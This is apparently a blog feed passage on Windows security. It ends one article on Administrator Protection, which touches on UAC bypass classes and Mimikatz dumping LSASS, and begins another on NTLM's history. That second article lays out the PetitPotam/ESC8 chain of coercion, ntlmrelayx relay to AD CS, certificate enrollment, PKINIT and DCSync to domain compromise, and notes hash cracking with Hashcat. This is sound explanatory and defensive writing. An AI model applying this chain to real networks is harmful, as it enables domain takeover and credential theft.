No. Administrator Protection runs in `appinfo.dll` inside the Application Information service, which runs in `svchost.exe` in VTL0 (the normal Windows kernel context). The SMAA itself is a normal SAM-database account, not a Virtual Secure Mode trustlet. The cross-process protections of Virtualization-Based Security apply to LSASS Credential Guard and a handful of other VTL1 services; the elevation pipeline is not one of them. The Secure Kernel article in this series treats VTL0 / VTL1 separation in detail.

Partially. Administrator Protection replaces Admin Approval Mode UAC when `TypeOfAdminApprovalMode = 2`. The credential-prompt path (the over-the-shoulder elevation that asks a standard user to enter an administrator&apos;s credentials) and classic Admin Approval Mode (`TypeOfAdminApprovalMode = 1`) coexist with Administrator Protection across different configurations [@ms-admin-protection]. On a device with Administrator Protection enabled, only the interactive admin&apos;s elevation path goes through the SMAA; the standard-user-asking-for-admin-credentials path is unchanged.

No. There is absolutely an admin token; it lives in a different account, in a different logon session, for a bounded lifetime. The marketing language describes lifetime and isolation, not nonexistence [@ms-developer-blog-2025, @bleepingcomputer-2024]. The SMAA&apos;s token persists for the lifetime of the elevated process; when the process exits, the token handle is released and the logon session is reaped. Between elevations, no SMAA token exists in memory.

No. Malware can still elevate if the user accepts the Hello prompt. The boundary Administrator Protection creates is between *silent* elevation and *consented* elevation, not between any elevation and none. Microsoft&apos;s design position is explicit: &quot;I expect that malware will still be able to get administrator privileges even if that&apos;s just by forcing a user to accept the elevation prompt&quot; [@forshaw-pz-jan2026]. The three sub-cases of consent-without-identity-verification from §9 are cost-raised, not eliminated. What changes is that the elevation must be visible. Defenders gain the ETW 15031 audit trail as a result.

No. EPM uses a virtual elevated account on a per-request basis with cloud-side policy, and the virtual account is *not* a member of the local Administrators group [@ms-epm-overview]. Administrator Protection uses a persistent local SMAA per admin user, with on-box `appinfo.dll` policy, and the SMAA *is* a member of the local Administrators group [@call4cloud-osint]. EPM is centrally policy-driven and works on standard-user devices; Administrator Protection is per-device architecture and applies only to interactive admin users. The two can coexist on the same device.

No. Per Microsoft Learn, remote logon, roaming profiles, and backup admins are out of scope [@ms-admin-protection]. A domain administrator who logs into a workstation interactively will not see the SMAA path. Microsoft has stated that domain scenarios may be added in future iterations; the current GA-target form is local-machine-only, interactive-admin-only.

No. Mimikatz inside the elevated SMAA session still has `SeDebugPrivilege` and can call `OpenProcess` on `lsass.exe` to dump LSASS unless LSA Protection (Run As Protected Process Light) and Credential Guard are also enabled. Administrator Protection protects the *elevation path*; it does not protect the *resulting privileged session*. To protect the privileged session, pair Administrator Protection with LSA Protection (`RunAsPPL=1`), Credential Guard, App Control for Business, and HVCI. The Secure Kernel article in this series covers the LSA Protection mechanism.
&lt;p&gt;The misconceptions are cleared. The next section returns to the opening hook with the new vocabulary the article has built.&lt;/p&gt;
&lt;h2&gt;18. The user-elevation companion to Credential Guard&lt;/h2&gt;
&lt;p&gt;Return to the two &lt;code&gt;whoami /all&lt;/code&gt; outputs from §1, this time with the vocabulary the article has built.&lt;/p&gt;
&lt;p&gt;The first output shows the primary user under classic UAC. One SID, one profile, one &lt;code&gt;HKCU&lt;/code&gt;, one logon-session LUID; the elevated console is the same user as the unelevated console, distinguished only by the integrity level on the token.&lt;/p&gt;
&lt;p&gt;The second output shows the same login under Administrator Protection. A different user name -- &lt;code&gt;ADMIN_&amp;lt;random&amp;gt;&lt;/code&gt; -- with a different SID linked to the primary admin via &lt;code&gt;ShadowAccountForwardLinkSid&lt;/code&gt; and &lt;code&gt;ShadowAccountBackLinkSid&lt;/code&gt;. A different profile under &lt;code&gt;C:\Users\ADMIN_&amp;lt;random&amp;gt;\&lt;/code&gt;. A different &lt;code&gt;NTUSER.DAT&lt;/code&gt; mapped as &lt;code&gt;HKCU&lt;/code&gt;. A fresh authentication-ID LUID minted by LSASS through the credential-less logon path described in §7, on the strength of &lt;code&gt;appinfo.dll&lt;/code&gt;&apos;s trusted request and a Hello gesture the primary user just performed. An ETW Event 15031 in the &lt;code&gt;Microsoft-Windows-LUA&lt;/code&gt; provider, freshly emitted, recording the elevation as approved, the application path, and the authentication method.&lt;/p&gt;
&lt;p&gt;The thesis lands. The elevation path is now itself a security boundary, with bulletin-grade fixes when it fails. Administrator Protection is the user-elevation companion to Credential Guard. Where Credential Guard isolated LSA secrets from admin-equals-kernel &lt;em&gt;inside&lt;/em&gt; the machine -- the &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Secure Kernel article&lt;/a&gt; in this series covers the VBS-rooted isolation in detail -- Administrator Protection isolates the elevation path &lt;em&gt;from&lt;/em&gt; the standard-user session. The two answer the two halves of the question the foundational Access Control article in this series left open: if admin equals kernel and tokens are bearer credentials, what is left to harden? The answer is the path that gets you there (Administrator Protection) and the data that is there once you arrive (Credential Guard).&lt;/p&gt;
&lt;p&gt;The December 2025 revert is the first iteration&apos;s learning round. The architecture is the right one. The application base catches up next. Forshaw&apos;s framing in February 2026 -- that Microsoft might have shipped this as a configurable mode rather than replacing admin approval completely -- is a reasonable critique, and the re-enablement is likely to address it. Until then, the operational reality on most stable Windows devices is the classic split-token model, with all the bypass canon it implies, and the SMAA design remains an Insider-Preview-and-policy-opted-in posture.&lt;/p&gt;
&lt;p&gt;What stays unchanged is the structural insight. The mechanism Microsoft used to make the elevation path a boundary is not novel; multi-user accounts have shipped in Windows NT since 1993. What changed is the &lt;em&gt;classification&lt;/em&gt;. Microsoft accepted, after twenty years of evidence, that the elevation pipeline needed to be a security boundary, and accepted with it the engineering cost: separate accounts, separate profiles, separate logon sessions, removal of auto-elevation, a credential gate instead of a click-through, an audit-trail ETW provider, and a willingness to ship bulletin-grade fixes for every Forshaw finding. The classification was the engineering decision. Everything else followed.&lt;/p&gt;
&lt;p&gt;This is what it took, in mechanism and in time, to make the elevation path real [@forshaw-pz-jan2026].&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;adminless-administrator-protection-in-windows&quot; keyTerms={[
  { term: &quot;Split-token model&quot;, definition: &quot;The Vista UAC mechanism that issues two access tokens at logon for a member of the local Administrators group: a filtered standard-user token and a linked full administrator token referenced via the TokenLinkedToken field.&quot; },
  { term: &quot;System Managed Administrator Account (SMAA)&quot;, definition: &quot;The hidden local user account that Windows creates per primary administrator when TypeOfAdminApprovalMode = 2, used to host elevated processes in a fresh logon session.&quot; },
  { term: &quot;ShadowAccountForwardLinkSid / ShadowAccountBackLinkSid&quot;, definition: &quot;The paired SAM attributes that encode the trust relationship between a primary admin user and its SMAA.&quot; },
  { term: &quot;TypeOfAdminApprovalMode&quot;, definition: &quot;The registry value selecting the elevation policy: 0 disables UAC; 1 selects classic Admin Approval Mode; 2 selects Admin Approval Mode with Administrator Protection.&quot; },
  { term: &quot;Auto-elevation&quot;, definition: &quot;The Windows 7 mechanism by which selected Microsoft-signed binaries elevated without showing a consent prompt; removed under Administrator Protection.&quot; },
  { term: &quot;COM Elevation Moniker&quot;, definition: &quot;The COM activation syntax that lets an unelevated caller request an elevated instance of a COM server class; the structural primitive of many UACMe bypasses.&quot; },
  { term: &quot;Credential-less LSA logon&quot;, definition: &quot;The mechanism by which LSA mints a primary access token for the SMAA without verifying any SMAA credential, on the strength of appinfo.dll&apos;s trusted request and the primary user&apos;s Hello result.&quot; },
  { term: &quot;Consent-without-identity-verification&quot;, definition: &quot;The primitive by which the legacy UAC consent dialog accepted a click on the secure desktop as sufficient evidence of consent. Administrator Protection&apos;s credential gate cost-raises three sub-cases (unattended-session, habituated-click, pretext click-through) without eliminating any.&quot; },
  { term: &quot;UI Access flag&quot;, definition: &quot;The token flag (TOKEN_UIACCESS) that allows a process to interact with windows of higher integrity, bypassing UIPI; the basis of five of Forshaw&apos;s nine pre-GA Administrator Protection bypasses.&quot; },
  { term: &quot;ETW provider Microsoft-Windows-LUA&quot;, definition: &quot;The Event Tracing for Windows provider, GUID {93c05d69-51a3-485e-877f-1806a8731346}, that surfaces Administrator Protection elevation events. Event 15031 = approved; Event 15032 = denied/failed.&quot; },
  { term: &quot;Security boundary (MSRC servicing criteria)&quot;, definition: &quot;A logical separation between code or data of different trust levels accompanied by a Microsoft commitment to issue a security update when an unauthorised crossing is found. Administrator Protection is the first elevation mechanism to be classified as a security boundary.&quot; }
]} questions={[
  { q: &quot;What four shared resources of the Vista split-token model do the four Administrator Protection fixes attack?&quot;, a: &quot;Same SID across both tokens; same %USERPROFILE%; same HKCU hive; same logon-session LUID.&quot; },
  { q: &quot;Why is the auto-elevation whitelist &apos;the bypass&apos;, in Davidson&apos;s framing?&quot;, a: &quot;The day Microsoft shipped a class of binaries that elevated silently based on signing and path, the entire UAC-bypass problem reduced to making one of those binaries do something the attacker wanted it to do. The whitelist itself was the structural mistake.&quot; },
  { q: &quot;What does the SAM forward/back linkage do at elevation time?&quot;, a: &quot;appinfo.dll&apos;s RAiLaunchAdminProcess reads the calling user&apos;s ShadowAccountForwardLinkSid, walks to the SMAA, and validates the matching ShadowAccountBackLinkSid. Without both attributes pointing at each other, the elevation is refused.&quot; },
  { q: &quot;What is the credential-less LSA logon at step 6 of the Administrator Protection pipeline, and why is the SMAA mintable without a credential?&quot;, a: &quot;After a positive Hello result on the primary user&apos;s credential, appinfo.dll asks the kernel to ask LSA to authenticate a new instance of the shadow administrator. LSA fulfils the request because the requester (appinfo.dll as SYSTEM) is trusted -- the same trust-the-requester pattern SCM uses to obtain service-account tokens -- and the SMAA has no human credential to verify in any case.&quot; },
  { q: &quot;Which class of Forshaw&apos;s nine pre-GA bypasses is uniquely caused by Administrator Protection itself rather than inherited from UAC?&quot;, a: &quot;The lazy DOS device directory hijack. The &apos;fresh logon session per elevation&apos; design property means the per-session DOS device directory is created lazily on first reference; an identification-level impersonation of the SMAA&apos;s linked token could trick the kernel into creating it with the attacker&apos;s owner SID.&quot; },
  { q: &quot;Why did Microsoft revert Administrator Protection on December 1, 2025?&quot;, a: &quot;A WebView2 application-compatibility regression: installers that wrote per-user state into the elevated SMAA&apos;s profile broke under unelevated callers running as the primary user. Forshaw confirmed the revert was unrelated to security findings.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>security</category><category>uac</category><category>administrator-protection</category><category>privilege-escalation</category><category>windows-hello</category><category>project-zero</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>NTLMless: The Death of NTLM in Windows</title><link>https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/</link><guid isPermaLink="true">https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/</guid><description>Thirty years of pass-the-hash, NTLM relay, PetitPotam, and ESC8 -- and the Kerberos engineering that finally lets Microsoft turn NTLM off by default.</description><pubDate>Sun, 10 May 2026 00:00:00 GMT</pubDate><content:encoded>
**NTLM is the 30-year-old fallback authentication protocol that Active Directory still rests on whenever Kerberos cannot do the job -- and every consequential modern AD attack (pass-the-hash, NTLM relay, PetitPotam, ESC8) lives in that fallback path.** Microsoft&apos;s exit plan (IAKerb, Local KDC, NEGOEX, the Negotiate-everywhere refactor) closes the four reasons NTLM survived, and the January 2026 roadmap names &quot;disabled by default in the next major Windows release&quot; as Phase 3. This article tells the whole arc as one story: how NTLM works on the wire, every attack class against it, exactly what is being removed -- and what is not.
&lt;h2&gt;1. Eight Minutes&lt;/h2&gt;
&lt;p&gt;A defender has done every retrofit Microsoft has shipped over twenty years. SMB signing enforced on every member server. EPA enabled on every IIS endpoint. &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; on. Restrict NTLM in audit mode. KB 5005413 applied to AD CS. An attacker with no credentials joins their network, runs &lt;code&gt;Coercer&lt;/code&gt; against a domain controller, and a handful of seconds later holds a Kerberos ticket-granting ticket for the Domain Admin account [@gh-coercer, @specterops-cert-preowned-blog]. Total elapsed time: less than the time it took you to read this paragraph. Total prerequisites for the chain: that NTLM still exists as a fallback path on Windows.&lt;/p&gt;
&lt;p&gt;The chain has a name. ESC8, from Will Schroeder and Lee Christensen&apos;s &quot;Certified Pre-Owned&quot; whitepaper, published June 17, 2021 [@specterops-cert-preowned-blog, @specterops-cert-preowned-pdf]. Its coercion primitive has another name. PetitPotam, from Lionel Gilles, published the next month. Together they take a fully retrofitted Active Directory environment to Domain Admin in four steps.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. &lt;strong&gt;Coerce.&lt;/strong&gt; Call &lt;code&gt;EfsRpcOpenFileRaw&lt;/code&gt; against any Windows server -- including a DC -- over LSARPC. The service, running as SYSTEM, NTLM-authenticates back to an attacker-controlled UNC path. No credentials required. 2. &lt;strong&gt;Relay.&lt;/strong&gt; &lt;code&gt;ntlmrelayx.py&lt;/code&gt; from Impacket sits on the listening side and forwards the live NTLM exchange to the AD CS Web Enrollment endpoint at &lt;code&gt;/certsrv/certfnsh.asp&lt;/code&gt; [@gh-impacket]. 3. &lt;strong&gt;Enroll.&lt;/strong&gt; The relayed authentication enrolls the DC&apos;s machine account for a client certificate against the &lt;code&gt;Machine&lt;/code&gt; template (or any default-enabled template that allows enrollment) [@specterops-cert-preowned-pdf]. 4. &lt;strong&gt;Forge.&lt;/strong&gt; The attacker uses the certificate to perform PKINIT against the KDC, obtains a TGT for the DC&apos;s machine account, and uses the DC machine account&apos;s TGT to DCSync the domain&apos;s hashes -- including the krbtgt hash -- achieving full domain compromise. Domain Admin in under ten minutes [@specterops-cert-preowned-blog].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Pause on what is and is not true here. SMB signing did not fail; SMB signing was not in the chain. EPA failed because it was deployed on IIS authentication endpoints generally but the &lt;code&gt;/certsrv/&lt;/code&gt; deployment lagged [@ms-kb5005413]. Credential Guard did not fail; Credential Guard protects the NT-hash, and the attacker never touched a hash. Restrict NTLM in audit mode worked exactly as labelled: it audited.&lt;/p&gt;
&lt;p&gt;The retrofits are not wrong. They patch the named primitives. The chain exploits the &lt;em&gt;existence&lt;/em&gt; of the fallback path, not a primitive. Every protective control is honest about what it does and silent about what it does not.&lt;/p&gt;

sequenceDiagram
    autonumber
    actor A as Attacker (no creds)
    participant DC as Domain Controller
    participant R as ntlmrelayx listener
    participant CA as AD CS /certsrv/
    participant KDC as KDC (PKINIT)
    A-&amp;gt;&amp;gt;DC: EfsRpcOpenFileRaw -- UNC to attacker share
    DC-&amp;gt;&amp;gt;R: NTLM AUTHENTICATE (SYSTEM (DC machine account))
    R-&amp;gt;&amp;gt;CA: Relay NTLM, enroll Machine cert as DC
    CA--&amp;gt;&amp;gt;R: Client certificate for DC
    R-&amp;gt;&amp;gt;KDC: PKINIT AS-REQ with DC cert
    KDC--&amp;gt;&amp;gt;A: TGT for DC, request service tickets at will
&lt;p&gt;This is the question that drives the rest of the article: &lt;em&gt;how did Windows arrive at a state where the most catastrophic modern Active Directory attack chain depends on a thirty-year-old fallback nobody wants?&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;2. Origins: Why NTLM Existed at All&lt;/h2&gt;
&lt;p&gt;Rewind to 1987. IBM and Microsoft ship LAN Manager 1.0 for OS/2. PCs are still mostly file-and-print islands on Token Ring or 10BASE-2 coax; networking exists, but &quot;domain&quot; is a word for what a single server controls. LAN Manager needs an authentication scheme that can run on hardware with 640 KB of RAM, no DES export licence, and roughly zero institutional knowledge about cryptography. What it produces, the LM hash, is a near-perfect snapshot of every constraint and assumption of its moment [@wp-lan-manager].&lt;/p&gt;
&lt;p&gt;The construction is short enough to write out. Take the password. Uppercase it. Pad or truncate to exactly fourteen ASCII characters. Split into two seven-byte halves. Convert each half into a 56-bit DES key (the eighth bit of each byte is a parity bit). Use each key to DES-encrypt the eight-byte constant &lt;code&gt;KGS!@#$%&lt;/code&gt;. Concatenate the two eight-byte ciphertexts. That is the LM hash [@wp-lan-manager, @wp-nt-lan-manager].&lt;/p&gt;

The LAN Manager password hash from 1987. Constructed by uppercasing the password, truncating or padding to 14 characters, splitting into two 7-byte halves, and DES-encrypting the constant `KGS!@#$%` with each half as a key. The two halves are independent, the password is case-insensitive, and there is no salt. Every property of this construction enables an attack class that survives into NTLMv2 [@wp-lan-manager].
&lt;p&gt;The eight-byte constant &lt;code&gt;KGS!@#$%&lt;/code&gt; is what you get when somebody types &quot;KGS&quot; and then mashes shift-1, shift-2, shift-3, shift-4, shift-5 on a 1980s American IBM keyboard. The constant is in the protocol because the protocol predates the cryptographic-engineering norm that constants should look random. It would not survive a 2026 design review; in 1987 nobody asked.&lt;/p&gt;
&lt;p&gt;Every choice tells a story about 1987. Uppercase, because some clients normalised case anyway and the developers wanted authentication to &quot;just work&quot; across mixed locale settings. Fourteen characters, because that was the field width DOS dictated. Two halves, because a 56-bit DES key already maxed out the practical computation; nobody was going to chain two DES operations through a feedback function with that much per-keystroke latency. No salt, because the deployment model was one server, one user database, and identical-password collisions were a feature for the help desk, not a leak.&lt;/p&gt;
&lt;p&gt;The result is password-equivalent: anyone who possesses the LM hash &lt;em&gt;is&lt;/em&gt; the user, forever, regardless of how the wire protocol presents the credential.&lt;/p&gt;
&lt;p&gt;Six years later, July 27, 1993, Windows NT 3.1 ships. NTLM(v1) arrives with it [@wp-nt-lan-manager]. The NT-hash is what you would design if you started over with mid-1990s assumptions but were not yet willing to abandon DES at the response layer. It is simpler than the LM hash and stronger in exactly one place: &lt;code&gt;NT-hash = MD4(UTF-16LE(password))&lt;/code&gt; [@wp-nt-lan-manager]. No truncation. No case folding. Sixteen bytes of output. The hash is still password-equivalent; what changes is that the &lt;em&gt;input&lt;/em&gt; to the hash is now whatever Unicode string the user typed, in full.&lt;/p&gt;
&lt;p&gt;The wire protocol around the NT-hash is the famous three-message handshake. NEGOTIATE from the client. CHALLENGE from the server (an eight-byte random nonce). AUTHENTICATE from the client, carrying a DES-based response computed from the NT-hash and the server challenge. The whole exchange is self-contained: nothing in the three messages binds the authentication to a particular transport, a particular client, a particular server, or a particular service [@ms-nlmp]. That property -- the absence of &lt;em&gt;binding&lt;/em&gt; -- is the property NTLM relay will eat for the next twenty-five years.&lt;/p&gt;

`MD4(UTF-16LE(password))`. Sixteen bytes. The single long-term secret that every NTLM authentication ever performed for a given user derives from. Possession of the NT-hash is mathematically equivalent to possession of the password for every authentication purpose. NTLMv2 changes the response computation but not the hash [@wp-nt-lan-manager].

timeline
    title NTLM and Windows authentication, 1987-2027
    1987 : LAN Manager 1.0 ships : LM hash construction
    1993 : Windows NT 3.1 : NTLMv1 + NT-hash MD4(UTF-16LE(pwd))
    1998 : NT 4.0 SP4 : NTLMv2 with HMAC-MD5 and AV_PAIRS
    2000 : Windows 2000 : Kerberos is the default; NTLM demoted to fallback
    2008 : MS08-068 patches SMB self-relay (CVE-2008-4037)
    2015 : Windows 10 RTM ships Credential Guard
    2019 : CVE-2019-1040 Drop the MIC (Simakov/Zinar)
    2021 : PetitPotam (Gilles) + ESC8 (Schroeder/Christensen)
    2023 : Palko commits to removing NTLM (October 11)
    2024 : NTLM marked deprecated (June); NTLMv1 removed in 24H2/Server 2025
    2025 : KB 5064479 enhanced NTLM auditing
    2026 : Phase 1 (audit) + IAKerb/Local KDC pre-release (Phase 2)
    2027 : Phase 3 -- NTLM disabled by default (next major Windows release)
&lt;p&gt;The third revision arrives with NT 4.0 Service Pack 4, October 1998. NTLMv2 throws away DES at the response layer and replaces it with HMAC-MD5. It introduces a &lt;em&gt;client&lt;/em&gt; challenge (so the response is no longer purely a function of the server&apos;s choice). It introduces AV_PAIRS, a small TLV structure carrying the target name, a timestamp, and -- in much later retrofits -- the channel binding hash and message integrity field [@ms-nlmp, @wp-nt-lan-manager]. NTLMv2 defeats pre-computation attacks against the response. It does not change the long-term secret. The NT-hash is still the NT-hash; possession is still authority.An intermediate variant, NTLM2 Session Security, shipped in NT 4.0 SP4 alongside NTLMv2 and is the dead end most often confused for v2. It added an 8-byte client challenge to the NTLMv1 DES envelope without touching the long-term hash, hoping to defeat pre-computation while preserving wire compatibility. It survived only as a transitional &lt;code&gt;LMCompatibilityLevel&lt;/code&gt; setting; nothing in the modern attack catalogue treats NTLM2 SS as a distinct target [@ms-nlmp].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;LM hash (1987)&lt;/th&gt;
&lt;th&gt;NTLMv1 (1993)&lt;/th&gt;
&lt;th&gt;NTLMv2 (1998)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Hash function for the long-term secret&lt;/td&gt;
&lt;td&gt;DES of constant with password halves&lt;/td&gt;
&lt;td&gt;MD4(UTF-16LE(password))&lt;/td&gt;
&lt;td&gt;MD4(UTF-16LE(password))&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Case-sensitive&lt;/td&gt;
&lt;td&gt;No (uppercase only)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Max input length&lt;/td&gt;
&lt;td&gt;14 characters (truncated)&lt;/td&gt;
&lt;td&gt;Unlimited Unicode&lt;/td&gt;
&lt;td&gt;Unlimited Unicode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Salted&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No (per-exchange challenge + timestamp added to the response, not a hash salt)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Response keyed MAC&lt;/td&gt;
&lt;td&gt;DES (3 keys, 56-bit each)&lt;/td&gt;
&lt;td&gt;DES (3 keys, 56-bit each)&lt;/td&gt;
&lt;td&gt;HMAC-MD5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Binds to target server name&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;AV_PAIR &lt;code&gt;MsvAvTargetName&lt;/code&gt; (retrofit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Binds to TLS endpoint&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;AV_PAIR &lt;code&gt;MsvAvChannelBindings&lt;/code&gt; (retrofit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Possession of hash = authority&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The two production response constructions on top of the same NT-hash. NTLMv1 chains three 56-bit DES operations across `K1 = NT-hash[0:7]`, `K2 = NT-hash[7:14]`, `K3 = NT-hash[14:16] || \x00\x00\x00\x00\x00`, encrypting the eight-byte server challenge under each. The third sub-key has only 16 bits of real entropy. NTLMv2 replaces all three DES operations with one HMAC-MD5 over `server_challenge || client_challenge || timestamp || av_pairs`, keyed by `NTOWFv2 = HMAC_MD5(NT-hash, UNICODE(Upper(user) || domain))` [@ms-nlmp, @wp-nt-lan-manager].
&lt;p&gt;Then comes Windows 2000, and Kerberos. Microsoft&apos;s plan was simple: in a domain, Kerberos handles everything; NTLM stays around as a compatibility blanket for the cases Kerberos cannot cover yet [@microsoft-ntlm-overview]. The trouble was that &quot;the cases Kerberos cannot cover yet&quot; turned out to be a permanent set, not a transitional one. Twenty-three years later, the same four cases would be the table-of-contents of Microsoft&apos;s NTLM-removal plan [@palko-2023-evolution]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;No domain-controller line-of-sight.&lt;/strong&gt; A laptop on a hotel Wi-Fi authenticating to a corporate file share through a VPN tunnel terminator has no Kerberos KDC to talk to. NTLM does not need one.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Local accounts.&lt;/strong&gt; A user signing into a workgroup machine or a domain-joined machine&apos;s local SAM has no domain at all; Kerberos has nothing to authenticate against.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No service principal name.&lt;/strong&gt; Kerberos requires a known SPN for the target service. Connect to a server by raw IP, by an alias DNS name not yet in the SPN database, or by a CNAME the operator forgot to register -- there is no SPN, so Kerberos cannot run.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hard-coded NTLM.&lt;/strong&gt; Application code that calls &lt;code&gt;AcquireCredentialsHandleW(..., &quot;Ntlm&quot;, ...)&lt;/code&gt; or RPC code that asks for &lt;code&gt;RPC_C_AUTHN_WINNT&lt;/code&gt; directly bypasses the negotiator and forces NTLM regardless of what is available.&lt;/li&gt;
&lt;/ol&gt;

The Simple and Protected GSS-API Negotiation Mechanism. When two parties want to authenticate but do not know which security mechanism they share, SPNEGO offers a list and picks the best one both support. On Windows the SSPI provider is called `Negotiate`, and it has historically chosen Kerberos when possible and NTLM otherwise [@microsoft-ntlm-overview]. The &quot;otherwise&quot; path is where every modern NTLM attack lives.
&lt;p&gt;Each fallback case is one shutter through which NTLM continues to leak into a Kerberos-by-default world. &lt;em&gt;The demotion was supposed to be terminal. Why did the four fallback cases turn out to cover most of the real-world authentication surface, and what does that look like on the wire?&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;3. The Wire: Three Messages and One Hash&lt;/h2&gt;
&lt;p&gt;Most defenders have never read an NTLM authentication off the wire. The cryptography is short enough to fit on one screen, and the structural property that drives the next 28 years of attacks is visible inside those three messages. The point of this section is to make that property impossible to miss.&lt;/p&gt;
&lt;h3&gt;NEGOTIATE, CHALLENGE, AUTHENTICATE&lt;/h3&gt;
&lt;p&gt;The client opens with &lt;code&gt;NEGOTIATE&lt;/code&gt;, advertising its capability flags: which signing modes it supports, whether it is willing to do session security, whether it is asking for extended session keys, and so on. The server replies with &lt;code&gt;CHALLENGE&lt;/code&gt;. The body of &lt;code&gt;CHALLENGE&lt;/code&gt; contains a single 64-bit nonce (the server challenge) and a TLV blob called &lt;code&gt;TargetInfo&lt;/code&gt;: a list of attribute-value pairs the server wants to bind into the authentication [@ms-nlmp].&lt;/p&gt;
&lt;p&gt;The client computes its response and sends &lt;code&gt;AUTHENTICATE&lt;/code&gt;. That message contains the user name, the workstation name, the response itself, the AV_PAIRS the client wants to echo back, a Message Integrity Code field (HMAC-MD5 of the concatenation of all three NTLM messages), and -- in EPA-enforced deployments -- a hash of the TLS endpoint certificate placed in the &lt;code&gt;MsvAvChannelBindings&lt;/code&gt; AV_PAIR [@ms-nlmp, @ms-epa-wcf].&lt;/p&gt;

sequenceDiagram
    autonumber
    participant C as Client
    participant S as Server
    C-&amp;gt;&amp;gt;S: NEGOTIATE (capability flags)
    S-&amp;gt;&amp;gt;C: CHALLENGE (server nonce 8B, TargetInfo AV_PAIRS)
    Note over C: NTOWFv2 = HMAC_MD5(NT-hash, UNICODE(Upper(user) plus domain))
    Note over C: NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge plus temp) where temp = version plus Z(6) plus Time plus ClientChallenge plus Z(4) plus ServerName plus Z(4)
    C-&amp;gt;&amp;gt;S: AUTHENTICATE (user, NTProofStr, temp, MIC, CBT)
    Note over S: Server replays the same HMAC_MD5 with its copy of the NT-hash to verify
&lt;h3&gt;The NTLMv2 response, verbatim&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;[MS-NLMP]&lt;/code&gt; §3.3.2 gives the response algorithm in three lines of pseudocode [@ms-nlmp]:&lt;/p&gt;
&lt;p&gt;$$\text{NTOWFv2} = \text{HMAC-MD5}\big(\text{NT-hash},\ \text{UNICODE}(\text{Upper(user)} \mathbin{|} \text{domain})\big)$$&lt;/p&gt;
&lt;p&gt;$$\text{temp} = \text{Responserversion} \mathbin{|} \text{HiResponserversion} \mathbin{|} Z(6) \mathbin{|} \text{Time} \mathbin{|} \text{ClientChallenge} \mathbin{|} Z(4) \mathbin{|} \text{ServerName} \mathbin{|} Z(4)$$&lt;/p&gt;
&lt;p&gt;$$\text{NTProofStr} = \text{HMAC-MD5}\big(\text{NTOWFv2},\ \text{ServerChallenge} \mathbin{|} \text{temp}\big)$$&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;temp&lt;/code&gt; byte string carries two version bytes, six zero bytes, the 8-byte FILETIME, the 8-byte client challenge, four zero bytes, the AV_PAIR list the spec calls &lt;code&gt;ServerName&lt;/code&gt;, and a final four zero bytes. The client sends &lt;code&gt;NTProofStr || temp&lt;/code&gt; as the response. The server, which holds its own copy of &lt;code&gt;NT-hash&lt;/code&gt; for the user (cached or fetched from the domain controller), recomputes the same three lines and checks equality. That is the entire response protocol.&lt;/p&gt;
&lt;p&gt;Notice what &lt;code&gt;NTOWFv2&lt;/code&gt; is. It is a function of two inputs: the NT-hash, and a normalised user/domain string. Both inputs are static once the user logs in. &lt;em&gt;Knowing the NT-hash is sufficient to compute every NTLMv2 response forever, against every server, for every challenge, until the password changes&lt;/em&gt; [@wp-pass-the-hash].Why is HMAC-MD5 considered fine for the response side but considered weak for the &lt;em&gt;key&lt;/em&gt; side? The response side is being asked: given a known key, can a verifier check a freshly computed tag? HMAC-MD5 still answers that without a known break. The key side is being asked: given a stolen 16-byte value, how hard is it to mount a precomputation attack on candidate passwords? MD4 of UTF-16LE is so cheap on modern GPUs that an 8-character password is in the minutes-to-hours range. Hashcat lists NetNTLMv2 (mode 5600) as the practical attack format and benchmarks NTLM cracking accordingly.&lt;/p&gt;
&lt;h3&gt;AV_PAIRS, MIC, and channel binding -- retrofits all the way down&lt;/h3&gt;
